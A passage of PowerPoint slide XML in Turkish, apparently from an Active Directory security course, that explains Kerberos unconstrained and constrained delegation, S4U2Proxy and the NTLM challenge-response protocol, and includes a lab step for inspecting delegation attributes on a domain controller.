            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servislere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (impersonate) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu durum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>senaryolarla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>birleştirildiğinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domainin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirilmesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domainlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kolayca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sıçranabilmesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sebep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olmaktadır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98378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E7F5-1CE2-64B7-E3E7-637DB12CE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Constrained Delegation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493400-0D87-2D5E-7FAC-734346A76E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Constrained Delegation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kısıtlanmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Delegasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de Unconstrained Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>benzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalışmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>belirli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servisler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dışındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servislere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (impersonation) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapamayacaktır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>işlemin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleşebilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DC’ye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>istemcinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> S4U2Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>isteği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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6A412F-7704-7F56-43F0-D546B0B5B6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25625"/>
            <a:ext cx="5181600" cy="372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809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55641-AF15-CE29-4C8C-C6CE5BDDA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Constrained Delegation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64F8508-CB63-02FD-7E2A-D5F40328D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3245" y="1575594"/>
            <a:ext cx="5525509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641988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93C0D-7260-F5C3-E0D4-0B2B4B12D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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #4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57F29-97F5-F7AB-F8B9-84A3C6533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Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory Users and Computers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>delegasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tanımlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değerlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>inceleyiniz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09223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0E47E-9098-2CFA-6DE1-124D1AA5A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NTLM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50159-0B49-2F25-0588-2DCB82898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NTLM (New Technology Lan Manager) Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yoğun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sınama-yanıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (challenge-response) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tabanlı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protokoldür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>direkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iletilmemektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şifreleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sırasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LMHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolünün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kendi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içerisinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> NTLMv1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> NTLMv2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>versiyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. NTLMv2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güçlü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şifreleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>damgası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>doğrulaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önlemler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayesinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> NTLMv1’e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güvenlidir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69870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B8E40-015E-1B9D-1ADC-15FC01327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NTLM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CAFC2F3-582B-5C1E-EDB0-121585EC62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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>İstemci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hizmet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>almak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istediği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
